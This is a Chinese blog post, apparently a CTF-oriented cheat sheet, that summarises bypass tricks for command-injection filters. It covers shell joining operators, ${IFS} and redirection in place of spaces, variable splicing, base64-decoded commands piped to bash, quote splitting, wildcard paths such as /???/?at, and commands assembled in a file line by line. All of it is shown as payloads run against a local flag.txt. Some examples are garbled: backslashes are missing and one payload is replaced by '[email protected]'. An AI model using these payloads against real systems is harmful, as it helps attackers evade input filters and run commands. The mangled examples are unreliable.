命令注入绕过方法总结

admin 2022年3月7日20:02:25评论556 views字数 1836阅读6分7秒阅读模式

命令注入绕过方法总结
点击上方蓝字,记得关注我们!


一、常见拼接符

|

直接执行后面的语句

&

前面和后面命令都要执行,无论前面真假

||

如果前面命令是错的执行后面的命令;否则只执行前面的语句

&&

如果前面为假,后面的命令也不执行如果前面为真则执行两条命令

;

Linux有效,前面和后面命令都要执行


二、过滤空格绕过无过滤

2.1、无过滤

root@kali:~# cat${IFS}flag.txtflag{a89da5faw8f4s5fd184d}

2.2、${IFS}

用法1:

root@kali:~# cat${IFS}flag.txtflag{a89da5faw8f4s5fd184d}

用法2:

root@kali:~# cat${IFS}$1flag.txtflag{a89da5faw8f4s5fd184d}

用法3:

root@kali:~# cat$IFS$1flag.txtflag{a89da5faw8f4s5fd184d}

2.3、重定向符(<>)

用法1:

root@kali:~# cat<>flag.txtflag{a89da5faw8f4s5fd184d}

用法2:

root@kali:~# cat<flag.txtflag{a89da5faw8f4s5fd184d}

2.4、%09(需要php环境)

命令注入绕过方法总结


三、黑名单绕过

3.1、拼接

root@kali:~# a=c;b=at;c=fl;d=ag.txt;$a$b $c$dflag{a89da5faw8f4s5fd184d}


3.2、Base64编码

root@kali:~# echo "cat flag.txt"|base64               //这个在本地执行加密flag{a89da5faw8f4s5fd184d}root@kali:~# `echo "Y2F0IGZsYWcudHh0Cg=="|base64 -d`   //注意两个反引号flag{a89da5faw8f4s5fd184d}root@kali:~# echo "Y2F0IGZsYWcudHh0Cg=="|base64 -d|bash //第二种执行方法,不需要反引号flag{a89da5faw8f4s5fd184d}


3.3、单引号、双引号

root@kali:~# c""at fla''g.txtflag{a89da5faw8f4s5fd184d}


3.4、反斜杠

root@kali:~# cat flag.txtflag{a89da5faw8f4s5fd184d}


3.5、$1、$2、$@

root@kali:~# c$1at [email protected]flag{a89da5faw8f4s5fd184d}


四、读文件命令过滤

more:一页一页的显示档案内容

less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页

head:查看头几行

tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示

tail:查看尾几行

nl:显示的时候,顺便输出行号

od:以二进制的方式读取档案内容

vi:一种编辑器,这个也可以查看

vim:一种编辑器,这个也可以查看

sort:可以查看

uniq:可以查看

file -f:报错出具体内容


五、通配符绕过

root@kali:~# /???/?at flagflag{a89da5faw8f4s5fd184d}root@kali:~# /???/?[a][t] ?''?''?''?''?''?''?''?''flag{a89da5faw8f4s5fd184d}


六、内联绕过

root@kali:~# echo "xxx`whoami`"xxxrootroot@kali:~# echo "xxx$(whoami)"xxxroot

七、绕过限制

root@kali:~# c> at f> la> g.txtflag{a89da5faw8f4s5fd184d}root@kali:~# echo "xxx$(whoami)"xxxroot

既然可以这样那我们是不是可以在某些限制长度的情况下执行命令,将命令一条一条输入一个文本中再执行,尝试一下

root@kali:~# echo "ca\">cmdroot@kali:~# echo "t\">>cmdroot@kali:~# echo " fl\">>cmdroot@kali:~# echo "ag.txt">>cmdroot@kali:~# cat cmdcatflag.txtroot@kali:~# sh cmdflag{a89da5faw8f4s5fd184d}

命令注入绕过方法总结


本文始发于微信公众号(凌晨安全):命令注入绕过方法总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月7日20:02:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   命令注入绕过方法总结https://cn-sec.com/archives/497485.html

发表评论

匿名网友 填写信息